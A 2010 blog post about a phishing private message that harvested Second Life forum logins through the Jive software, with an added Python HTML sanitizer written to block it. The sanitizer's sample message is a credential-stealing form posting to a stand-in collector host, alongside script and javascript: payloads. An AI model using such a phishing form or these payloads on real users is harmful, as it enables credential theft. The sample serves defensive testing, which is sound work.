Thursday 6 May 2010

Something Phishy About Jive!


Yesterday saw another example of LL's poor decision in adopting Clearspace's Jive software for their new forums/blogorums. The Jive-powered blog software, an alternative to LL's now scrapped vBulletin boards, fell foul of a simple phishing JavaScript, which harvested hundreds of user names and passwords.

A presumed Russian user going under the account name of "Aels Cybertar" placed some JavaScript in a private message (PM) and sent it to an as yet unknown number of people. The message arrived in users' inboxes as a message from Aels Cybertar titled "Hi, remember me? ^.^". When the PM was opened, the phishy script asked for the user's SL account name and password in order to read the message, as seen in the pic below.
[Image: screenshot of the phishing prompt shown when the PM was opened]
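The mechanism described above only works if the forum renders a message's script, form and event-handler markup verbatim to the reader. As an added example (not code from the original post, from Jive or from LL), here is a Python allowlist sanitizer of the kind a forum or PM system would apply to user-supplied HTML before rendering it: it discards script and form elements together with their content, strips every attribute not on a short per-tag allowlist, and only keeps plain http/https links. The class name, `sanitize_message`, the `collector.invalid` form target and the sample message are all constructed for this example.

```python
"""Allowlist HTML sanitizer for user-submitted messages.

Added example, not code from the original post, from Jive or from LL.
Assumed setting: a forum/PM system that stores user-supplied HTML and
renders it to other users. The credential prompt described in the post
only works if <script>, <form>/<input> and on* handler attributes
survive into the rendered page; sanitizing against an allowlist on
output removes them while keeping plain formatting. Names below (the
class, sanitize_message, the sample PM) are constructed for this example.
"""
from html import escape
from html.parser import HTMLParser

# Tags a message is allowed to keep; everything else is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u",
                "ul", "ol", "li", "blockquote", "a"}
# Per-tag attribute allowlist; no on* handler survives because none is listed.
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
# For these, the element AND its entire content are discarded, so inline
# script and credential forms never reach the reader at all.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "form"}
SAFE_URL_PREFIXES = ("http://", "https://")


class MessageSanitizer(HTMLParser):
    """Rebuilds a message from parsed tokens, keeping only allowlisted parts."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized output fragments
        self.open_tags = []    # allowlisted tags currently open
        self.drop_depth = 0    # >0 while inside a DROP_CONTENT element
        self.removed = []      # audit trail of what was stripped

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self.drop_depth = 1
            self.removed.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.removed.append(tag)   # tag dropped, its text content is kept
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.removed.append(f"{tag}@{name}")
                continue
            # Only plain web URLs; this rejects javascript: and data: links.
            if name == "href" and not (value or "").strip().lower().startswith(SAFE_URL_PREFIXES):
                self.removed.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_CONTENT_TAGS:
                self.drop_depth -= 1
            return
        if tag in VOID_TAGS or tag not in self.open_tags:
            return
        # Close up to and including the matching tag so output stays balanced.
        while self.open_tags:
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            # Text is re-escaped so a message cannot smuggle markup as text.
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.open_tags:   # balance anything the sender left open
            self.out.append(f"</{self.open_tags.pop()}>")


def sanitize_message(raw_html):
    """Return (clean_html, removed_items) for one user-supplied message."""
    parser = MessageSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample modelled on the PM described in the post: a friendly
# greeting wrapping a script, a credential form and a javascript: link.
SAMPLE_PM = (
    '<p>Hi, remember me? ^.^</p>'
    '<script>showLoginPrompt()</script>'
    '<form action="http://collector.invalid/">Log in to read this message: '
    '<input name="user"><input type="password" name="pass"></form>'
    '<p onmouseover="alert(1)">Click <a href="javascript:alert(1)">here</a> '
    'or <a href="https://blogs.secondlife.com/">the real site</a>.</p>'
)

if __name__ == "__main__":
    clean, removed = sanitize_message(SAMPLE_PM)
    print(clean)
    print("removed:", removed)
```

Run against the sample, only the two paragraphs and the https link survive; the script, the form with its inputs and prompt text, the mouseover handler and the javascript: href are all recorded in the `removed` list, which is the sort of audit trail that would have flagged a PM like this one before anyone opened it. Disabling all HTML in messages, as LL did after the fact, is the same idea with an empty allowlist; sanitizing on output, server side, lets harmless formatting through while still closing the hole.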
While some might say that people should have noticed this, it has to be taken into account what a borked piece of software Clearspace's Jive is. There has been an endless stream of criticism of LL's decision to adopt it, and users have demanded a better system to work with. Recently Jive was upgraded, to some user satisfaction, but the revamp seemed to add as many new bugs to the system as it did new features. Some people had their whole profiles deleted or were unable even to log in.

One result of this upgrade was to stop persistent log-ins, thereby forcing people to log in every time they revisited the pages. I am sure that this forced increase in having to repeatedly enter your account name and password suckered many people into believing that Jive was just getting even more secure.

LL did disable all PMs once made aware, but shortly after that a user with the account name "Nykon Brunsen" posted the following message in a General Discussions thread discussing the phishing incident:

Nykon Brunsen wrote:

"Lindens... it was funny.. u have no limits to users in one PM =)

u scripted sending via ID, not name... That you have made the only thing correctly - have disabled PM. Here that I have received. Enjoy. PS. from russia with love^.^"

There then followed an 18-page table listing the IP addresses, browsers used, account names and passwords of all those he had captured through the phish. Whether this was the total or a small sample we do not know. I have reprinted an edited and extracted version below with IPs and passwords removed. Although LL say they have reset the passwords of all users who were sent the PM, whether they opened it or not, some people are already saying that this is not the case.

The Flogs remain up today, although all functionality/HTML has been disabled, so it would seem the Flogs are still not secure to use. This is a big egg-on-their-face moment for LL and Clearspace, as it effectively shows that all of LL's security procedures were bypassed by one simple phishing exercise. Not only that, but it was conducted on one of their own sites, over which they have received much criticism for their use of Clearspace's Jive software. The phishing exercise for the moment seems to have been done for non-malicious purposes, so as to show LL how open their system was and how lacking Jive was in protecting them. So far I've not heard of any user reporting missing inventory or money. The posting of users' account names and passwords on a public forum, though, can only be considered ill thought out and criminally negligent.

Below is a shortened list of users who were caught. There were 18 pages of names and passwords, and I include only 2 extracted pages here, with IPs and passwords deleted, as an example. I had to chuckle at one of the users who was caught and who had used a really weak password. Last week they were boasting in a forum of how, with their long, long experience in IT and in installing and maintaining big corporate networks, they could run LL's data centres and would have avoided last week's outage. Good to see that such superheroes can get phished and don't know how to set a strong password. I hear that Prokofy was hooked by the phish too; she'll be relieved to know that her details didn't appear on the list that I have.

Edit: Prok has a nice first person report of it here.

If your name appears here then I would advise you to change your password, if it has not already been reset by LL.

[Image: two extracted pages of the captured-account list, with IPs and passwords removed]
4 comments:

  1. Seems like another wtg! for SL, all profit and no thought. They got told it was shit; I'm glad they found out the hard way.

  2. You wait and see, the Lindens will just slap a plaster on and say everything is ok. People will tell them it's still borked and they will pay no attention till the next time something happens.

    It's the new Tao of Linden, "Screw you people unless the lab is losing money!"

  3. I looked all over the LL blogs and I can't find that user you mentioned or his post anywhere?????????

    the Nykon Brunsen dude?????????

  4. @ Anonymous

    Sorry anon, I should have said in my post that the blog mods moved in and removed his post, which was surprising given their usual snail's pace reaction to stuff on the blogs.

    Luckily I left the page on one tab and revisited later on another tab and saw that it had been deleted; so I had a nice screendump available. :-)

    It was in this thread I believe http://blogs.secondlife.com/thread/20957?tstart=30
